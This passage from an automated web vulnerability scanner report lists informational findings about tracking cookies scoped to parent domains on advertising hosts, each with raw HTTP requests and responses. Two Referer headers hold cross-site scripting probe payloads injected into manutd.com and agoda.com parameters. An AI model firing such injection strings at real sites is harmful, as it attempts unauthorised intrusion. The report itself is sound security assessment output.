Set-Cookie: CTG=1317599345; path=/; domain=.hitbox.com; expires=Sun, 09-Oct-2011 23:49:05 GMT; max-age=604800
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Sun, 02 Oct 2011 23:49:06 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

13.74. http://ehg-twi.hitbox.com/HGct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-twi.hitbox.com
Path:   /HGct

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: WSS_GW, CTG. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HGct?hc=&hb=DM55040895RD95EN3%3BDM570806C8RA71EN3&hec=1&vjs=HBX0201.03u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-twi.hitbox.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: WSS_GW=V1z%X%eCer@ir; CTG=1317599837

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:57:19 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: WSS_GW=V1z%X%@Q^^iXi; path=/; domain=.hitbox.com; expires=Mon, 01-Oct-2012 23:57:19 GMT; max-age=31536000
Set-Cookie: DM55040895RDV6=V1^Q(#X"rz%X%@Q^^iXieXr^%rz%zrz%"%X%@Q^^iXiz%X%@Q^^iXi"%X%@Q^^iX^"%X%@Q^^iXieXr^%r"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)O:ma6r"OuKr6%QzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-twi.hitbox.com; expires=Mon, 01-Oct-2012 23:57:19 GMT; max-age=31536000
Set-Cookie: DM570806C8RAV6=V1@%(#X"rz%X%@Q^^iXieXr^%rz%zrz%"%X%@Q^^iXiz%X%@Q^^iXi"%X%@Q^^iX^"%X%@Q^^iXieXr^%r"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-twi.hitbox.com; expires=Mon, 01-Oct-2012 23:57:19 GMT; max-age=31536000
Set-Cookie: CTG=1317599839; path=/; domain=.hitbox.com; expires=Sun, 09-Oct-2011 23:57:19 GMT; max-age=604800
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Sun, 02 Oct 2011 23:57:20 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

13.75. http://ff.connextra.com/BlueSquare/selector/client

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ff.connextra.com
Path:   /BlueSquare/selector/client

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BlueSquare/selector/client?client=BlueSquare&placement=Guardian_300x312_Football_Premiership HTTP/1.1
Host: ff.connextra.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
X-Served-By: vm-pcxtad05.gs1.betgenius.com
P3P: CP=NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR SAMa BUS IND UNI PUR COM NAV
Location: http://ff.connextra.com/servlet/controller?service=Guardian_300x312_Football_Premiership_v2&client=BlueSquare&placement=Guardian_300x312_Football_Premiership
Content-Length: 0
Expires: Sun, 02 Oct 2011 23:50:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:50:54 GMT
Connection: close
Set-Cookie: FrequencyCappingCookie=; Domain=.connextra.com; Expires=Mon, 01-Oct-2012 23:50:54 GMT; Path=/BlueSquare
Set-Cookie: BlueSquare=A%7Cpostimpression%7C1%7C201110030050%7C7%7CGuardian_300x312_Football_Premiership%7CGuardian_300x312_Football_Premiership_v2%7C; Domain=.connextra.com; Expires=Mon, 01-Oct-2012 23:50:54 GMT; Path=/


13.76. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/985248306/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/985248306/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/viewthroughconversion/985248306/?label=M6MLCJbtiQIQsuTm1QM5a299 HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://www.agoda.com/pages/agoda/default/page_AdScript.aspx?type=R&pagetypeid=1&conversionID=985248306&conversionLabel=M6MLCJbtiQIQsuTm1QM5a299"onerror%3d"alert(1)"d0370ac32b&_=1317602266727
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: googleads.g.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 03 Oct 2011 00:55:57 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Set-Cookie: test_cookie=CheckForPermission; expires=Mon, 03-Oct-2011 01:10:57 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;

13.77. http://i.w55c.net/ping_match.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /ping_match.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping_match.gif?ei=OPENX&rurl=http%3A%2F%2Fr.openx.net%2Fset%3Fpid%3D6f983c5f-b90f-c87c-2ba9-c74bb1f0f9ed%26rtb%3D_wfivefivec_ HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchrubicon=1; matchbluekai=1; matchaccuen=1; matchadmeld=1; optout=1; matchpubmatic=1; matchcontextweb=1; matchadbrite=1; matchyahoo=1; matchgoogle=1; matchopenx=1; wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 302 Found
Date: Sun, 02 Oct 2011 23:54:02 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Tue, 01-Oct-13 23:54:02 GMT
X-Version: DataXu Pixel Tracker v3
Cache-Control: private
Content-Length: 0
Location: http://r.openx.net/set?pid=6f983c5f-b90f-c87c-2ba9-c74bb1f0f9ed&rtb=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F
Via: 1.1 mdw061001 (MII-APC/2.1)
Content-Type: text/plain


13.78. http://image2.pubmatic.com/AdServer/Pug

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9MjE5MSZ0bD0yNTkyMDA=&piggybackCookie=-5675633421699857517= HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26620&s=26621
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; pubfreq_26072=823-3:1098-3; KRTBCOOKIE_16=226-uid:3620501663059719663; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; PUBMDCID=1; pubfreq_26621=; pubtime_26621=TMC; pubfreq_26621_21557_1687682837=559-1; PMDTSHR=cat:; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; DPPIX_ON=YES

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:52:56 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Set-Cookie: KRTBCOOKIE_218=4056--5675633421699857517=; domain=pubmatic.com; expires=Wed, 02-Oct-2013 01:52:56 GMT; path=/
Set-Cookie: PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; domain=pubmatic.com; expires=Sat, 06-Sep-2014 14:14:48 GMT; path=/
Content-Length: 1
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html


13.79. http://images.hotelplanner.com/hotelimages/s/028000/028920A-thumb.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.hotelplanner.com
Path:   /hotelimages/s/028000/028920A-thumb.jpg

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotelimages/s/028000/028920A-thumb.jpg HTTP/1.1
Host: images.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:20 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: TLTSID=F123A950ED5310ED160FDD8181683406; Path=/; Domain=.hotelplanner.com
Set-Cookie: TLTUID=F123A950ED5310ED160FDD8181683406; Path=/; Domain=.hotelplanner.com; Expires=Mon, 03-10-2021 00:09:20 GMT
HostName: TWEB10
Last-Modified: Fri, 23 Sep 2011 05:06:00 GMT
ETag: "857-c3e25e00"
Accept-Ranges: bytes
Content-Length: 2135
Content-Type: image/jpeg

...[SNIP]...

13.80. http://int.teracent.net/tase/int

Summary

Severity:   Information
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tase/int?adv=219&fmt=redir&sec=0&pid=search2&type=Hotels&u1=&u2=Boston&u3=10/09/2011&u4=10/16/2011&u5=7&u6=&u7=S250&u8=B260711&u9=&u10=&u11=Boston+Logan+Intl.+%28BOS%29&u12=&u13=1&u14=MA&u15=US&OrderID=1317602253983&OrderValue= HTTP/1.1
Host: int.teracent.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1317602303729_239168105_as3104_imp|194#1317602303729_239168105_as3104_imp|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p441r=b$u-21#5.8Pr|i-2870764#1.8Pr|; p270r=b$u-7#A.8Qp|i-1401516#1.8Qp|i-1643195#1.8Qp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|; p194r=b$u-98#5.8Qp|i-tracking#..1.8Qp.1.8Qp|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: p219r=b$u-77#A.8Qp|i-H!FaxnS5xi!8TG!8Vy!IJ3~#1.8Qp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:41:22 GMT; Path=/
Set-Cookie: imp=a$le#1317602482047_282671641_ap3100_int|194#1317602303729_239168105_as3104_imp|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:41:22 GMT; Path=/tase
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43
Date: Mon, 03 Oct 2011 00:41:21 GMT
Connection: close

GIF89a.............!.......,...........D..;

13.81. http://int.teracent.net/tase/int

Summary

Severity:   Information
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tase/int?adv=270&fmt=html&sec=0&pid=search&dest=1643195 HTTP/1.1
Host: int.teracent.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://fls.doubleclick.net/activityi;src=3057879;type=searc451;cat=searc443;u1=US;u12=109368;u13=324884;u14=255157;u15=1643195;u16=04%2F10%2F11-07%2F10%2F11;u18=2;ord=53963720?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1317384286603_272223897_ap3103_int|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|; p441r=b$u-21#5.8Pr|i-2870764#1.8Pr|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: p270r=b$u-7#A.8Qp|i-1643195#2.8Qp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:10:24 GMT; Path=/
Set-Cookie: imp=a$le#1317600624289_282559054_ap3100_int|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:10:24 GMT; Path=/tase
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 352
Date: Mon, 03 Oct 2011 00:10:23 GMT
Connection: close

<html><head></head><body>
<img src="http://bp.specificclick.net?pixid=99013083" width="1" height="1" /><img src="http://ads.bluelithium.com/pixel?id=1027970&t=2" width="1" height="1" /><img src="http
...[SNIP]...

13.82. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=trv_cs=7[504]&betq=9669=409042[504] HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=1653087;type=hotel756;cat=hotel329;u2=BOS;u3=unknown;u4=unknown;u5=0;u6=0;u7=55.26;u13=1;u15=US;u16=34A63N3;ord=1;num=418599216785?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:09:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Wed, 02-Oct-2013 00:09:02 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 03 Oct 2011 01:09:02 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

13.83. http://leadback.hotwire.db.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.hotwire.db.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=airsearch_cs=1&betq=12047=428151&xbetq=view=hs^NA^Boston^10-09^10-16 HTTP/1.1
Host: leadback.hotwire.db.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:41:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Wed, 02-Oct-2013 00:41:25 GMT; path=/
Set-Cookie: GUID=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: C2=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

13.84. http://lm.trafficmp.com/clicksense/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lm.trafficmp.com
Path:   /clicksense/pixel

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clicksense/pixel?id=105935&t=i HTTP/1.1
Host: lm.trafficmp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4fae74084-d4c4-4986-af20-d7ce71839597-gs1x0mwv; naiopt=out

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:41:31 GMT
Expires: Mon, 03 Oct 2011 00:41:31 GMT
P3P: CP="NOI ADM DEV CUR"
X-Handled-By: awswrh18/127.0.0.1
Set-Cookie: T_7te4=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_d3c6=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 2=3_7CU_i48Lo; Domain=.trafficmp.com; Expires=Tue, 02-Oct-2012 00:41:31 GMT; Path=/
Set-Cookie: 8=00000000000; Domain=.trafficmp.com; Expires=Sat, 01-Oct-2016 00:41:31 GMT; Path=/
Accept-Ranges: bytes
Last-Modified: Fri, 23 Sep 2011 14:41:54 GMT
Content-Type: image/png
Content-Length: 123
Connection: close

.PNG
.
...IHDR.....................sRGB........    pHYs..........+......tIME.....0/D..O...IDAT..c````......^.*:....IEND.B`.

13.85. http://loadm.exelator.com/load/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadm.exelator.com
Path:   /load/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /load/?p=204&g=071&j=0&buid=55785307-A5DC-4E3A-B452-DDBD426D3A1D HTTP/1.1
Host: loadm.exelator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=26071&s=26072&a=21044
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DNP=eXelate+OptOut; EVX=eJxNy7EJwDAMBMBdNIFeTpB4DyNcunZpvHtiAknq4xrBOagUqY2Fs1PrIIICh6en6ZHqSEtI7cSncSu2hmZ51F41%252Fd1z61oX7Lwbhg%253D%253D

Response

HTTP/1.1 302 Found
X-Cnection: close
X-Powered-By: PHP/5.2.1
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: EVX=deleted; expires=Sun, 03-Oct-2010 00:09:45 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 03-Oct-2010 00:09:45 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJxLtDK0qi62MrBSUrJOBLEzrQysi60MLayUDM2NzeLN440MTOINzA3jDeINlaxrawFA5Qzi; expires=Tue, 31-Jan-2012 00:09:46 GMT; path=/; domain=.exelator.com
Location: http://load.s3.amazonaws.com/pixel.gif
Content-Length: 0
Date: Mon, 03 Oct 2011 00:09:46 GMT
Server: HTTP server


13.86. http://m.xp1.ru4.com/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?_o=1807966&_t=17210472&_c=17210403&_b=17210472&ssv_c2=Y&ssv_b=c2&ssv_1=285445478 HTTP/1.1
Host: m.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://view.atdmt.com/AVE/iview/285445478/direct;wi.728;hi.90/01/yAeNjx,bhirWmWzqkjb?click=http://dm.travelocity.com/event.ng/Type%3dclick%26FlightID%3d111781%26AdID%3d150102%26TargetID%3d9683%26Values%3d215%26Redirect%3d
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000; 31041217-B31041253=2|31041263|0|0|0|31041234|31041231|-1; 66281-B66290=3|0|0|0|0|66286|110253|-1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 03 Oct 2011 00:12:55 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: 17210403-B17210472=4|17210475|0|0|0|17210466|17226288|-1; domain=.ru4.com; path=/
Cache-control: private, no-cache, must-revalidate
Content-type: image/gif
Content-length: 43
X-Cnection: close

GIF89a.............!.......,...........D..;

13.87. http://m.xp1.ru4.com/meta

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta?_o=179638&_t=dm&ssv_p=cw&ssv_u=OO-00000000000000000 HTTP/1.1
Host: m.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://bh.contextweb.com/bh/visitormatch?tag=106934&pid=538936
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:50:18 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: 31041217-B31041253=2|31041263|0|0|0|31041234|31041231|-1; domain=.ru4.com; path=/
Location: http://adadvisor.net/adscores/g.pixel?sid=9297587126
Content-length: 0
X-Cnection: close


13.88. http://m.xp1.ru4.com/meta

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

